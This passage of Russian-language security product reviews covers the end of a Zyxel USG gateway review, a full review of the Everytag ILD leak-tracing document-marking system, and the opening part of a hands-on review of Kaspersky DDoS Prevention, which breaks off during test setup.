VPN20204040Максимальное число соединений SSLVPN15152020Максимальное число управляемых точек доступа (AP)18181818Физические размеры216 x 143 x 33216 x 143 x 33242 x 175 x 36272 x 187 x 36 Для управления устройствами Zyxel USG USG40/40W/60/60W предусмотрен упрощенный режим настройки EASY MODE, который специально рассчитан на пользователей из небольших компаний. Рисунок 5. Панель управления режима EASY MODE устройств Zyxel USG USG40/40W/60/60W При использовании этого режима настройка конфигурации выполняется с помощью удобных интегрированных программ-мастеров (wizard) с неперегруженным интерфейсом. В то же время наличие режима EASY MODE никоим образом не означает урезание функциональности (за исключением модуля SSL Inspection) и не ограничивает администраторов в дополнительных расширенных настройках. Старшие модели Zyxel USG110/210/310 и USG1100/1900Серии USG110/210/310 и USG1100/1900 функционально идентичны и различаются в основном только техническими характеристиками и, соответственно, производительностью. Таблица 3. Внешний вид и базовые параметры устройств Zyxel USG USG110/210/310/1100/1900МодельСпецификацияUSG110USG210USG310USG1100USG1900 Интерфейсы4 x LAN/DMZ,2 x WAN, 1 x OPT4 x LAN/DMZ,2 x WAN, 1 x OPT8 x GbE (конфигурируемые)8 x GbE (конфигурируемые)8 x GbE (конфигурируемые)Порты USB22222Консольный портДа (DB9)Да (DB9)Да (DB9)Да (DB9)Да (DB9)Возможность монтажа в стойкуДаДаДаДаДаМакс. число интерфейсов VLAN163264128128Максимальное число туннелей IPSec VPN10020030010002000Максимальное число соединений SSLVPN150150150500750Инспекция SSL (HTTPs)ДаДаДаДаДаМаксимальное число управляемых точек доступа (AP)343434130130Возможность установки в кластер (HAPro)ДаДаДаДаДаРезервирование внешних соединений (LinkAggregation)НетНетДаДаДаУправление хотспотамиДаДаДаДаДаФизические размеры300 x 188 x 44300 x 188 x 44430 x 250 x 44430 x 250 x 44430 x 250 x 44 Ключевое отличие старших моделей Zyxel USG — наличие механизма кластеризации и повышенной отказоустойчивости. Шлюзы USG110/210/310 и USG1100/1900 гарантируют высокое качество соединения, обеспечивая постоянно доступную связь. При развертывании внутри устройства собираются в кластер active-passive High-Availability (HA) или failover (в режиме соединения при сбоях). Для обслуживания указанных режимов компанией Zyxel разработан специальный сервис Device HA Pro, обеспечивающий мгновенное переключение при сбоях.Для поддержания внешней доступности и балансировки нагрузки при использовании интернета применяется механизм multi-WAN load balancing/failover (в том числе с поддержкой сотовых USB-модемов). Кроме того, поддерживается функция IPSec load balancing and failover, улучшая отказоустойчивость VPN-соединений с помощью организации VTI (Virtual Tunnel Interface). Особенности администрирования устройств линейки Zyxel USGУправлять шлюзами серии USG и настраивать правила безопасности помогает удобный инструмент — Unified Security Policy (Единая политика безопасности). Благодаря ему администратор может применять нужные настройки для каждой из функции UTM, при этом сократив время обслуживания и получив упорядоченное управление политикой безопасности в сети компании.Инженеры Zyxel позаботились не только о качестве самих устройств, но и разработали сопутствующие утилиты, которые призваны облегчить рутинные операции по администрированию шлюзов. Одна из них — Zyxel One Network (ZON), предназначенная для автоматизации повторно выполняемых процедур развертывания и управления сетью. Zyxel One Network упрощает конфигурирование, управление и диагностику для администраторов и офицеров безопасности. Технология Zyxel Smart Connect помогает сетевым устройствам Zyxel детектировать в корпоративной сети и распознавать друг друга, что позволяет полностью автоматизировать, например, восстановление заводских настроек или перезагрузку. Для решения задачи автоматизированного и оперативного обновления прошивок в шлюзах USG Series реализована другая полезная утилита — специализированный сервис Cloud Helper.Cloud Helper обеспечивает простой поиск информации о последней версии нужной прошивки, которая устанавливается сразу же после официального релиза производителя, что гарантирует ее достоверность и актуальность. Таким образом, обслуживание всей экосистемы Zyxel в компании существенно упрощается за счет интеграции в сеть различных устройств: маршрутизаторов, коммутаторов, точек доступа Wi-Fi, шлюзов и автоматизации их обслуживания.Компания Zyxel размещает на выделенном портале Zyxel OneSecurity оперативные бюллетени и рекомендации относительно последних угроз безопасности. Кроме того, на сайте можно найти информативные материалы о новинках сетевой безопасности. Интересной фишкой является то, что поиск нужной информации выполняется одним щелчком мыши прямо в интерфейсе продуктов USG Series. Упорядоченная структура ресурса, удобные инструкции и FAQ помогают администраторам безопасности обеспечить должный уровень защиты сети компании и упрощают управление продуктами Zyxel. Сервисы и лицензирование устройств линейки Zyxel USGВ каждое из устройств линейки Zyxel USG зашит полный набор технологий, а активация той или иной функциональности происходит посредством подключения необходимой лицензии. Производителем поддерживается модульность в следующем виде:Комплексная подписка на все сервисы безопасности Zyxel (AS, AV, CF, IDP/DPI).Подписка на сервис Zyxel CF (контентная фильтрация).Лицензия Zyxel на увеличение числа одновременных SSL VPN.Подписка на сервис Zyxel AV (антивирус).Подписка на сервис Zyxel IDP/DPI (обнаружение/предотвращение вторжений и патруль приложений).Подписка на сервис Zyxel AS (антиспам).Лицензия Zyxel SecuReporter.Лицензия Zyxel на увеличение числа управляемых точек доступа.Комплект лицензий Zyxel для IPSec VPN-клиента.Лицензия Zyxel для Cloud CNM SecuManager.Таким образом политика лицензирования компании Zyxel предоставляет максимальную гибкость при поставке шлюзов USG для разных компаний с индивидуальными потребностями, а также позволяет добиться оптимального баланса стоимости, производительности и безопасности.Дополнительно Zyxel предлагает воспользоваться Сервисом по удаленной настройке оборудования и Сервисом по опережающей замене оборудования в случае выхода из строя. ВыводыУниверсальные шлюзы безопасности Zyxel линейки USG соответствуют требованиям, предъявляемым сегодня к устройствам класса UTM с полноценным NGFW на борту. Поддерживаются все современные защитные технологии: межсетевой экран следующего поколения, модули построения IPSec VPN и SSL VPN, средство обнаружения и предотвращения вторжений (IDP), контроль приложений, антивирус, антиспам, модуль контентной фильтрации, проверка и инспекция SSL-трафика.Отдельно стоит отметить реализацию системы централизованного управления, существенно упрощающую конфигурирование парка устройства в компании. Модельный ряд достаточно широкий для удовлетворения задач любых компаний: от небольшой организации до крупного предприятия. Наличие гибкой политики лицензирования позволяет подобрать необходимый набор функций, не переплачивая лишнего. В то же время всегда существует возможность докупить и моментально активировать дополнительные технологические возможности.
Обзор Everytag Information Leaks Detection (ILD) — системы контроля и защиты документов
January 29, 2019, 3:08 am

Система контроля и защиты от несанкционированного распространения документов Everytag Information Leaks Detection является дополнением к традиционным средствам защиты от утечки информации, таким как DLP. Благодаря запатентованной технологии и интеграции с популярными системами документооборота система позволяет гарантированно обнаружить виновника утечки информации даже по скану бумажной копии или фотографии документа с экрана компьютера. ВведениеЧто такое ILD, и зачем она нужнаОсновные возможности Everytag Information Leaks DetectionАрхитектура Everytag Information Leaks DetectionПредустановленные роли в Everytag Information Leaks DetectionСценарии использования системы Everytag Information Leaks Detection6.1. Защита документов при помощи Everytag Information Leaks Detection6.2. Поиск виновника утечки при помощи Everytag Information Leaks DetectionВыводы ВведениеЦифровизация экономики помимо очевидной для всех пользы привносит и дополнительные риски, связанные с защитой информации. Использование популярных на рынке методов и средств защиты информации, к сожалению, не дает должного эффекта — утечки конфиденциальных документов и баз данных происходят с завидным постоянством (т. е. всегда есть остаточный риск утечки конфиденциальной информации).Проблема состоит в том, что контролируются операции с файловыми объектами внутри корпоративного периметра или за его пределами. Доступ к конфиденциальному документу может быть у целой группы сотрудников, и зачастую крайне сложно обнаружить виновника утечки только техническими средствами, без дополнительных оперативно-розыскных мероприятий. Инсайдеру обычно не нужно пересылать документ со своего ящика наружу или копировать на внешний носитель. Достаточно сфотографировать экран рабочего ноутбука. На сегодняшний момент проблема контроля документа после открытия (data control in use) практически никем не решается. Экран можно сфотографировать, бумажный документ можно ксерокопировать и затем отсканировать заново. Затем копия документа может быть распространена без малейшего риска для злоумышленника. Примеры подобных утечек конфиденциальных документов последнее время все чаще стали появляться на просторах интернета.Система контроля и защиты от несанкционированного распространения документов Everytag Information Leaks Detection (ILD), разработанная российской компанией «ЭвриТег», решает эту проблему. Она позволяет гарантированно обнаружить виновника утечки информации (конкретного сотрудника). Рассмотрим далее принципы работы и функциональные возможности представленного продукта. Что такое ILD, и зачем она нужнаКогда мы говорим про информацию как ценный ресурс, мы имеем в виду документы — как бумажные, так и электронные. Каким же образом они защищены? При бумажном документообороте есть архив документов, ответственный сотрудник (например, секретарь) и определенный учет таких документов. При электронном документообороте применяются различные технические средства управления доступом и контроля за перемещением данных. Таким образом, мы имеем вполне защищенные контуры. Но в обоих описанных случаях (бумажный и электронный документооборот) есть определенные границы, за которыми перечисленные меры по обеспечению безопасности информации уже могут не работать. Рисунок 1. Уязвимости систем защиты от утечек информации Как видно из приведенного выше рисунка, как только информация покидает контролируемый периметр, она уже не защищена имеющимися средствами и методами. При этом содержащаяся в документах информация, может быть выведена за пределы контролируемого периметра разными способами:фото с экрана монитора;фото (ксерокопия) бумажного документа;хищение бумажной копии.Мы не берем в расчет случаи, например, когда человек запоминает информацию в документах или переписывает ее от руки. Мы рассматриваем только утечки информации в виде копий (электронных или бумажных) с оригиналов документов как наиболее распространенный случай. На практике именно такие утечки наносят наибольший урон, так как в глазах общественности они имеют неопровержимые доказательства в виде копий утекших документов-оригиналов (в том числе могут содержать подписи и печати), в отличие от голословного пересказа информации от «анонимного источника».Система контроля и защиты от несанкционированного распространения документов Everytag Information Leaks Detection (ILD) предназначена для обеспечения безопасности и контроля перемещения информации за пределами контролируемого периметра. Основное ее назначение — выявить канал утечки информации, а именно нарушителя. Однако система не выполняет каких-либо блокирующих функций, препятствующих несанкционированному распространению информации, и это следует иметь в виду.Однако если пользователи будут предупреждены о внедрении такой системы и гарантированных последствиях для них в случае совершения злонамеренных действий, то вероятность совершения подобных действий будет значительно ниже. По крайней мере, большинство пользователей задумается и не станет лишний раз рисковать. Основные возможности Everytag Information Leaks DetectionСистема контроля и защиты от несанкционированного распространения документов Everytag Information Leaks Detection (ILD) направлена на установление канала утечки информации (документа), а именно определяет, кем, когда и откуда была получена конкретно эта копия документа.Все документы, которые подлежат защите, помещаются в защищаемое хранилище. Далее каждый раз, когда пользователь обращается к такому документу (открывает его на экране или выводит на печать), система создает трансформированную уникальную копию, которая и предоставляется пользователю. Таким образом, оригинал подменяется на персонализированную копию, по которой в последующем возможно установить конечного пользователя, получившего эту копию.Уникальная копия не содержит специальных символов, каких-либо меток или прочих артефактов, которые были бы заметны и устранены злоумышленником. Здесь применяется иной подход, а именно в каждой строке, в каждом элементе документа от шапки и текста документа, до оттиска печати, рукописной подписи и следа от дырокола, содержится уникальная информация, идентифицирующая владельца такой копии.Исходный документ делится на страницы (блоки) и далее преобразуется в универсальный формат по специально разработанному алгоритму. По результатам такого преобразования создается псевдослучайная последовательность. Другими словами, производится форматирование документа, незаметное для человека. А именно осуществляются сдвиги слов, букв, изменение полей и т. д, которые по сути и образуют персонализированную копию. Рисунок 2. Персонализированная копия документа В основе работы Everytag Information Leaks Detection (ILD) лежит запатентованный алгоритм: он автоматически преобразовывает каждый документ в новую персонализированную копию каждый раз, когда документ открывают. При этом система ILD не хранит полноценные копии документов, потребляя ресурсы систем хранения данных. Вместо этого предлагается следующее решение: сохраняется только оригинал в защищенном хранилище и уникальные комбинации алгоритмов преобразований с параметрами получателя каждой копии, размером менее 1 Кб.Алгоритм преобразования разработан таким образом, что из одного документа формата А4 может быть выдано более 27 000 уникальных копий каждому из более чем семи миллиардов жителей Земли (стандартная страница текста формата А4 содержит 205 891 136 094 649 уникальных комбинаций одного документа).При установлении факта распространения документа за пределы компании система предоставляет инструменты для проведения расследования:Поиск скомпрометированного документа, который может осуществляться по образцу, атрибутам или смысловому тексту.Анализ образца и исходного документа на предмет идентификации персонализированной копии.По полученным результатам эксперт делает заключение о совпадении или несовпадении полученного образца с копиями оригинального документа, созданными в системе. Таким образом, эксперт устанавливает конкретного пользователя, кому принадлежит созданная копия документа и кто, возможно, является нарушителем безопасности информации. Архитектура Everytag Information Leaks DetectionСистема Everytag Information Leaks Detection прошла несколько стадий развития от использования сторонних продуктов до самостоятельного решения. Изначально система была разработана на базе решений IBM, после была реализована версия на базе решений open source.В настоящее время система реализована полностью как самостоятельное решение. Кроме того, система Everytag Information Leaks Detection внесена в Единый реестр российских программ для электронных вычислительных машин и баз данных как «Модуль для маркировки и выявления совпадающих печатных форм документов» (рег. номер ПО 4464, Приказ Минкомсвязи России от 12.04.2018 №157).Внедрение системы может быть выполнено несколькими вариантами (схемы внедрения):Автономное. Система работает без интеграции с системами документооборота.Интеграционное решение для СЭД. Все конфиденциальные документы хранятся в защищенном хранилище, а СЭД управляет доступом к документам. На текущий момент в системе реализована интеграция со следующими системами электронного документооборота:IBM FileNetDocumentumDirectumSharepointAlfrescoЛогика СЭДОблачный сервис. Система разворачивается на инфраструктуре разработчика, и доступ к ней предоставляется через интернет. Такой вариант допускает и автономную работу, и интеграцию.В состав системы могут входить следующие компоненты (в зависимости от выбранной схемы внедрения):серверная часть (реализована на Java);пользовательский интерфейс (реализован в виде веб-интерфейса);СУБД PostgreSQL или любая другая база SQL;защищаемое хранилище — документы могут храниться как в системе ILD, так и непосредственно в СЭД компании (в зависимости от схемы внедрения). Предустановленные роли в Everytag Information Leaks DetectionВ системе Everytag Information Leaks Detection есть предустановленные основные роли, которые реализуют полную логику ее работы. В рамках ролей прописаны основные функции (защита документа, предоставление доступа, добавление документа), которые предоставляются пользователям в системе. Кроме того, есть мелкие функции (удаление документа, настройка структуры папок и т. д.), которые могут быть назначены пользователям. Предустановленные роли приведены ниже:Пользователь — роль присваивается сотруднику с учетной записью в Active Directory и позволяет получить копию документа.Делопроизводитель — роль позволяет защищать документы и выдавать доступ к ним третьим лицам.Офицер — роль, позволяющая проводить расследования, а также получить копию документа. Сценарии использования системы Everytag Information Leaks DetectionEverytag Information Leaks Detection имеет несколько сценариев использования:Когда сотрудники оповещены о внедрении системы:при внедрении системы сотрудники оповещаются о ее внедрении и возможностях по обнаружению каналов утечек информации;потенциальные злоумышленники знают, что могут быть вычислены, что в свою очередь предотвращает возможную утечку информации.Когда сотрудники не оповещены о внедрении системы:при внедрении системы сотрудники не оповещаются об этом. Целью такого внедрения является в том числе точечный поиск злоумышленника путем организации ложной утечки информации;злоумышленники будут вычислены, а процессы работы с документами усовершенствованы.Защита документов при помощи Everytag Information Leaks DetectionКак мы писали выше, система может быть интегрирована с СЭД, и тогда ее работа для пользователя будет полностью прозрачной. А может представлять собой автономное решение, которое для простоты понимания мы рассмотрим ниже.Работа с системой строится в зависимости от роли, которая присвоена пользователю. В основном интерфейсе представлены все доступные пользователю операции (меню «Мои копии», «Документы», «Запросы» и т. д.). Рисунок 3. Основной интерфейс системы Everytag Information Leaks Detection В основном интерфейсе представлены документы, которые заведены в систему и требуют дополнительной защиты. Иконки слева характеризируют их статус защиты. Для добавления документа в систему пользователю необходимо загрузить его, указать его класс защиты и атрибуты делопроизводства. Рисунок 4. Создание документа в системе Everytag Information Leaks Detection После добавления документа необходимо выполнить операцию по его защите, выбрав соответствующий пункт выпадающего меню. Рисунок 5. Защита документа в системе Everytag Information Leaks Detection Пользователям, которые будут запрашивать такой документ, будет предоставляться уже не сам оригинал, а его персонализированная копия — при каждом новом запросе системой создается новая уникальная копия. Далее пользователь с ролью «Делопроизводитель» может создавать такую копию для третьих лиц. Рисунок 6. Создание персонализированной копии документа в Everytag Information Leaks Detection Также пользователи могут самостоятельно формировать запросы на доступ к защищаемым документам. в которых указан сам документ и комментарий к запросу (обоснование). Такой запрос содержит наименование документа и комментарий к запросу и обрабатывается пользователем с ролью «Делопроизводитель». Запрос может быть одобрен или отклонен, а также дополнительно можно установить срок действия доступа к документу. Рисунок 7. Запрос на предоставление копии в Everytag Information Leaks Detection В целом выше мы описали весь процесс по заведению документа в систему, его защиту и дальнейшую работу с его копиями. Интерфейс вполне простой и понятный для работы. По сути это первая основная задача системы — организация работы с защищаемыми документами и создание их уникальных копий.Поиск виновника утечки при помощи Everytag Information Leaks DetectionПерейдем ко второй важной возможности, которую предоставляет система и для чего в принципе она разработана, — это расследование инцидента.Если произошла утечка информации и защищаемый документ несанкционированно проявился где-то за пределами компании, у нас есть возможность выяснить, кто именно виноват и когда это случилось. Для организации подобного расследования в системе есть роль «Офицер».Первоначальная задача, стоящая перед таким экспертом, — поиск документа в системе. Доступны следующие варианты поиска документа:по его атрибутам;по тексту;по образцу. Рисунок 8. Поиск документа по атрибутам и тексту в Everytag Information Leaks Detection Интересной особенностью системы является именно поиск документа по образцу. Система предоставляет возможность загрузить имеющийся образец и выполнить поиск по нему. Причем это не обязательно цельный документ, возможна загрузка имеющегося фрагмента не самого лучшего качества. Рисунок 9. Поиск документа по образцу в Everytag Information Leaks Detection После нахождения документа в системе эксперт может начать расследование. На данном этапе система самостоятельно проводит сравнение образца документа с хранящейся копией. По итогам такого процесса система выдает результаты проведенного расследования, с которыми и будет в дальнейшем работать эксперт. Рисунок 10. Инициация расследования в Everytag Information Leaks Detection Рисунок 11. Результаты расследования в системе Everytag Information Leaks Detection Эксперту предоставляются результаты по всем возможным совпадениям, найденным в системе. Далее необходимо проанализировать и выявить искомое совпадение, тем самым установив нарушителя. При этом в документах используется следующая цветовая палитра:красный цвет — исследуемый образец;синий цвет — копия;черный цвет — совпадение (получается при наложении).Изучив полученные результаты, эксперт делает выводы о совпадении образца с копией. По атрибутам данной копии определяется пользователь, которому принадлежит установленная копия (нарушитель безопасности). Рисунок 12. Экспертный анализ образца документа в Everytag Information Leaks Detection Таким образом, процесс расследования является достаточно простой задачей и не требует специализированных знаний от эксперта. ВыводыСистема Everytag Information Leaks Detection (ILD), не заменяя собой то множество средств защиты, которые применяются сегодня во многих компаниях, удачно дополняет их. Система является инструментом, который помогает гарантированно определить виновного в утечке электронной копии конфиденциального документа.Представленная система является интересным и новым решением на рынке информационной безопасности. Конкурентов у нее практически нет (на российском рынке нам известна еще одна такая система), что подчеркивает ее уникальность. Когда появляется необходимость защитить документ от несанкционированного распространения, а именно выявить источник утечки информации, система Everytag Information Leaks Detection способна в полной мере решить данную задачу. При этом, несмотря на ее достаточно узкую функциональную направленность, она является компенсирующим дополнением к традиционным средствам защиты информации, а порой и обязательной составляющей системы обеспечения информационной безопасности. Особенно это касается случаев, когда нелегитимное распространение документов чревато для организации огромными репутационными и финансовыми потерями.Достоинства:Система имеет собственный запатентованный алгоритм преобразования текста.Система внесена в Единый реестр российских программ для электронных вычислительных машин и баз данных как «Модуль для маркировки и выявления совпадающих печатных форм документов» (рег. номер ПО 4464, Приказ Минкомсвязи России от 12.04.2018 №157).Количество копий, которые создаются в процессе преобразования документов, практически неисчерпаемо.Создаваемые копии документов не хранятся (сохраняется только оригинал документа и создаваемые уникальные комбинации алгоритмов преобразований).Система поддерживает несколько вариантов внедрения.Позволяет проводить расследование, по результатам которого гарантированно будет выявлен нарушитель, тем самым создается «неотвратимость наказания».Работает там, где стандартные средства защиты не способны проконтролировать безопасность информации.Недостатки: Процесс расследования не является полностью автоматизированным и требует участия эксперта.Система применима только к документам, в которых содержатся какой-либо текст (в отношении электронных писем, баз данных представленная система уже не применима).Отсутствует сертификация по требованиям безопасности ФСТЭК России (ожидается в 2019 году).
Обзор Kaspersky DDoS Prevention
February 4, 2019, 11:14 pm

Kaspersky DDoS Prevention позволяет защитить ресурсы клиентов от атак типа «отказ в обслуживании» путем перенаправления пользовательского трафика на Центры очистки «Лаборатории Касперского». Новые режимы подключения защищаемых ресурсов клиента, возможность мониторинга бот-сетей, собственные запатентованные технологии — далеко не полный перечень технологических новинок Kaspersky DDoS Prevention. Чтобы максимально подробно познакомиться с продуктом, мы подключили защиту для одного из ресурсов Anti-Malware.ru, организовали тестовую атаку и подробно описали процесс и результат. ВведениеСпецифика современных DDoS-атакАрхитектура и функциональные особенности Kaspersky DDoS PreventionУникальные технологии в Kaspersky DDoS PreventionСпособы подключения Kaspersky DDoS PreventionСервисная поддержка Kaspersky DDoS PreventionПодключение защиты Kaspersky DDoS PreventionРабота с клиентским порталом Kaspersky DDоS PreventionПроцесс отражения реальной DDоS-атаки под защитой Kaspersky DDoS PreventionОсобенности лицензирования и сертификаты Kaspersky DDoS PreventionВыводы ВведениеТемы, связанные с информационной безопасностью, не покидают новостные ленты на протяжении всех последних лет, и мы к этому уже привыкли. И если раньше рассуждения про кибератаки с высоких трибун часто вызывали удивление, то сегодня они имплементированы уже в конкретные проекты национального масштаба. При этом одним из ключевых трендов всегда были и остаются DDoS-атаки, так как онлайн-технологии и связь сегодня интегрированы в большую часть бизнес-процессов компаний и нашу с вами повседневную жизнь. Несмотря на уверения некоторых аналитиков, атак такого рода если и становится меньше количественно, то никак не меньше качественно, и реальный ущерб от них будет только расти. Достаточно вспомнить о самых свежих инцидентах 2018 года. Согласно отчету Сбербанка, им было отражено 90 DDoS-атак в 2018 году, 25 из которых были высокой мощности. По данным различных источников, в среднем в день в 2018 году по всему миру осуществлялось более 250 DDoS-атак, что на 20% больше показателей 2017 года и на 40% — 2016-го. «Лаборатория Касперского», напротив, рапортует о снижении DDoS-активности примерно на 13% в 2018 по сравнению с предыдущим годом. Однако уменьшение количества компенсируется «качеством»: растет средняя продолжительность, мощность, разрушительность, а также степень серьезности подготовки продуманных целенаправленных атак злоумышленниками. Рисунок 1. Поквартальное сравнение количества DDoS-атак, отраженных службой Kaspersky DDoS Protection в 2017–2018 гг (за 100% принято количество атак в 2017 г.) Про сам продукт мы уже рассказывали в одной из наших прошлых статей, сегодня же мы поделимся реальным опытом использования решения в боевых условиях на примере защиты одного из наших ресурсов. Чтобы максимально детально разобраться в работе продукта на практике, мы осуществили полный цикл заказа решения: от подачи заявки на защиту нашего сайта virusinfo.info до организации тестовой атаки и оценки действий команды реагирования «Лаборатории Касперского». Справился ли один из лидеров мирового рынка кибербезопасности с настоящей DDoS-атакой — читайте далее. Специфика современных DDoS-атакПо данным «Лаборатории Касперского», на первом месте по типу остаются SYN-флуд-атаки, нацеленные на исчерпание системных ресурсов, причем их доля непрерывно растет, нападения с применением UDP-трафика на втором месте, далее идут HTTP, TCP и ICMP.Мощность же самих DDoS-атак продолжает расти: так, в марте текущего года установлен новый мировой рекорд — DDoS-атака на провайдера мощностью 1,7 Тб/сек. Указанные «достижения» обязаны использованию в том числе Memcached-серверов, что позволяет усилить атаку в десятки тысяч раз. Примечательно, что для амплификации атак уже задействуются серверы таких крупных хостинг-провайдеров, как Digital Ocean, OVH, Sakura. Аналитики специализированного поисковика Shodan в марте 2018 подготовили отчет, согласно которому Memcached-серверов в онлайне было более 100 000. Несмотря на то, что после череды громких инцидентов количество такого рода «дыр» в интернете снижается, на сегодняшний день их все равно остаются десятки тысяч. Рисунок 2. Отчет Shodan о количестве доступных публичных Memcached-серверов, март 2018 Еще один тренд связан с популярной историей майнинга. В марте 2018 появилась информация о новом ботнете из маршрутизаторов MikroTik, который, по мнению экспертов, создавался именно для добычи криптовалют. Однако организация такой масштабной бот-сети, названной Hajime, потенциально может означать подготовку к атакам, еще более разрушительным, нежели от знаменитого Mirai.Вместе с тем, стоимость DDoS-атак в последнее время несколько упала, даже несмотря на очевидные проблемы у организаторов, связанные с блокировкой соответствующих теневых сервисов и арестами организаторов в США, Великобритании и других странах (например, громкая история с закрытием Webstresser.org).В качестве предсказаний будущих трендов аналитики прогнозируют появление DDoS-атак с использованием протокола HTTP/2, а также широкое использование уязвимостей протокола BGP для перехватов и изменения маршрутов трафика. По заявлениям экспертов «Лаборатории Касперского», SYN Flood и прочие короткопакетные атаки так и будут оставаться популярными.Чтобы эффективно противостоять постоянно меняющимся современным атакам, решение Kaspersky DDoS Prevention (далее — KDP) развивается и эволюционирует вместе с ландшафтом угроз, об актуальной архитектуре и новинках продукта мы расскажем далее. Архитектура и функциональные особенности Kaspersky DDoS PreventionО технологиях Kaspersky DDoS Prevention мы уже рассказывали в наших прошлых публикациях «Технологии отражения атак в Kaspersky DDoS Prevention» и «Обзор Kaspersky DDoS Prevention». Поэтому в данном материале кратко напомним основные принципы работы решения, а также опишем наиболее интересные новшества.Kaspersky DDoS Prevention позволяет обнаруживать аномалии и детектировать атаки различных типов (в том числе amplification, direct flood, TCP short-packet, TCP connect, L7 (HTTP) и TLS (HTTPS) и другие) на ресурсы клиентов. И если раньше была возможность контролировать исключительно единичные адреса, то в обновленной версии продукта доступны к постановке на защиту и целые подсети. Митигация атак осуществляется путем перенаправления пользовательского трафика на Центры очистки «Лаборатории Касперского», где паразитный трафик блокируется. В результате нормализуется нагрузка на целевой ресурс или подсеть. Мониторинг всей сетевой активности, а также информация об инцидентах доступна на специальном портале https://kdp.kaspersky.com. Принцип работы системы представлен на рисунке ниже. Рисунок 3. Схема работы Kaspersky DDoS Prevention KDP состоит из четырех модулей: Коллектор, Центр очистки, Сенсор, Клиентский портал.Коллектор представляет собой программно-аппаратный комплекс сбора и обработки данных о трафике от клиентов, а также аккумулирует логику критериев обнаружения аномалий и атак, правил фильтрации. Также Коллектор обеспечивает контроль работоспособности других компонентов KDP и управляет их работой.Центр очистки является ключевым компонентом KDP, который непосредственно осуществляет анализ и фильтрацию проходящего через него клиентского трафика. Центры очистки (на самом деле их много, и они физически распределены по всему миру) располагаются на площадках «Лаборатории Касперского» в ЦОДах и образуют единую распределенную систему. Эта система обрабатывает перенаправленный в сторону клиента трафик и доставляет его очищенным до целевых защищаемых ресурсов. В текущих реалиях важно отметить, что трафик российских клиентов не покидает территорию страны и фильтруется на отечественных площадках. Добавим, что, проанализировав опыт эксплуатации KDP, с целью обеспечения повышенной отказоустойчивости «Лаборатория Касперского» пришла к выводу о необходимости увеличения количества и емкости upstream-каналов в своих дата-центрах, а также объединения всей инфраструктуры оптическим кольцом.Сенсор (программно-аппаратный комплекс, обеспечивающий сбор статистики по трафику для целей обнаружения атак) ранее обязательно устанавливался на площадке заказчика. Такая схема организации мониторинга предполагала, что трафик защищаемых ресурсов переключается на KDP только в случае атаки. Одним из ключевых нововведений KDP стала возможность не устанавливать Сенсор на территории клиента благодаря новому способу подключения Always ON — постоянному прохождению трафика через KDP. Данный режим работы стал доступен благодаря упомянутой выше глобальной модернизации инфраструктуры.Клиентский портал предоставляет каждому клиенту личный кабинет на ресурсе https://kdp.kaspersky.com, через который пользователи взаимодействуют с KDP. Возможности портала нагляднее всего продемонстрируем в ходе непосредственного тестирования решения в следующих разделах обзора. Уникальные технологии в Kaspersky DDoS PreventionВ процессе разработки Kaspersky DDoS Prevention команда «Лаборатории Касперского» серьезно и местами научно подходит к развитию решения. Так, за последний год было официально зарегистрировано три патента на внедренные технологии в продукте, в том числе связанные с применением машинного обучения.Одна из них — система классификации посетителей защищаемого сайта, основанная на автоматическом проставлении оценок «благонадежности» для них. Благодаря ей существенно расширяются возможности по блокировкам и разблокировкам доступа к различным ресурсам, теперь этот процесс перестает быть бинарным (как при использовании black/white-листов) и становится более гибким.Вторая запатентованная технология позволяет существенно повысить качество обнаружения HTTP-атак при использовании протоколов шифрования за счет применения поведенческого анализа. Система изучает access-log web-сервера и, без необходимости расшифровки трафика (или доступа к расшифрованному трафику), выносит вердикт о вредоносности такого трафика.Стоит сказать и о появлении в KDP технологии доставки трафика методом проксирования (с использованием протоколов HTTP/HTTPS, TCP, UDP). При таком способе подключения и в случае необходимости терминирования HTTPS-сессии на серверах KDP «Лаборатория Касперского» самостоятельно и бесплатно выпускает для клиентов дублирующий сертификат. Способы подключения Kaspersky DDoS Prevention«Лаборатория Касперского» теперь предлагает не два, а три варианта подключения к системе Kaspersky DDoS Prevention, которые подбираются исходя из задач и текущей организации сетевой инфраструктуры. Первый подходит для защиты отдельных сайтов или порталов компании, второй и третий — для обеспечения большого количества ресурсов в подсети клиента (или подсети целиком).Первый — KDP Connect. Заключается в перенаправлении трафика с помощью изменения DNS А-записи защищаемого ресурса на адрес KDP в режиме Always On (постоянно), доставка очищенного трафика может осуществляется через прокси-сервер, GRE-туннели или через выделенный канал.Второй — KDP Connect +. Трафик перенаправляется средствами протокола BGP в режиме Always On (постоянно), доставка очищенного трафика осуществляется через GRE-туннели или выделенный канал.Третий — KDP Control. Трафик также перенаправляется средствами протокола BGP, но уже в режиме On Demand (только под атакой), доставка очищенного трафика осуществляется через GRE-туннели или выделенный канал.Отдельно отметим, что KDP имеет API для интеграции с защитными решениями в инфраструктуре клиента, например, с целью обмена информацией с SIEM или поставки данных в SOC. Сервисная поддержка Kaspersky DDoS PreventionИспользование любого корпоративного продукта «Лаборатории Касперского» всегда дополняется предоставлением сервиса высокого класса. Kaspersky DDoS Prevention здесь, естественно, не исключение, ведь чтобы эффективно противостоять современным DDoS-атакам в максимально короткие сроки, требуется вовлечение аналитиков-экспертов в предметной области. Специально выделенная группа Emergency Response Team в режиме 24/7 отслеживает аномалии в трафике каждого заказчика, что позволяет как можно раньше обнаружить начинающуюся атаку и необходимым образом сконфигурировать режимы фильтрации. Постоянный мониторинг оперативной обстановки позволяет быстро реагировать на опасные изменения в характеристиках происходящей атаки.По статистике «Лаборатории Касперского», большинство клиентов KDP пользуются программой расширенной поддержки, которая обеспечивает гарантированное время ответа (согласно SLA), приоритетное обслуживание в режиме 24x7x365 и тонкую настройку системы фильтрации.Отдельно отметим уникальность самого факта существования SLA KDP для такой неоднозначной с точки зрения исполнения гарантированных обязательств услуге, качество которой зависит не только от вендора решения защиты от DDoS-атак. По нашим данным, на сегодняшний день ни у одного другого поставщика подобной услуги в открытом доступе нет сравнимого по обязательствам SLA.Добавим, что информация об актуальных DDoS-атаках и техниках нападений аккумулируются в базе знаний KDP Intelligence, которая тесно интегрируется с другими источниками данных, например с сервисом подписки на списки ботнетов Kaspersky Anti-Botnet Feeds, что повышает эффективность каждой из услуг. Подключение защиты Kaspersky DDoS PreventionДля тестирования возможностей Kaspersky DDoS Prevention и организации тестовой атаки для наших экспериментов был выбран сайт virusinfo.info. Определившись с «подопытным», мы обратились в «Лабораторию Касперского» за предоставлением сервиса KDP. Для организации услуги потребовалось заполнить небольшую анкету и решить дополнительные нюансы со службой поддержки (например, нам сходу были предложены несколько простых, но дельных советов, например, по закрытию неиспользуемых портов). Для развертывания системы мы решили использовать подключение путем перенаправления трафика по DNS 